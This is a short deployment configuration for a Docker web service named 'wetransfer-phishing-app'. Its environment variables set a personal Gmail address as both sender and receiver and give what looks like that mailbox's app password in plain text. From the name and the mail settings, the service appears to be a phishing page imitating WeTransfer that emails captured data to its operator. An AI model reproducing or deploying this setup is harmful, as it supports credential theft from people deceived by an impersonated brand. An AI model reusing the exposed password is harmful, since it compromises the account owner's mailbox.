services:
  - type: web
    name: wetransfer-phishing-app
    env: docker
    dockerfilePath: Dockerfile
    buildCommand: ""
    startCommand: ""
    envVars:
      - key: EMAIL_SENDER
        value: nwekee125@gmail.com
      - key: EMAIL_PASSWORD
        value: mhhihywubresapns
      - key: EMAIL_RECEIVER
        value: nwekee125@gmail.com
      - key: PORT
        value: "5000"
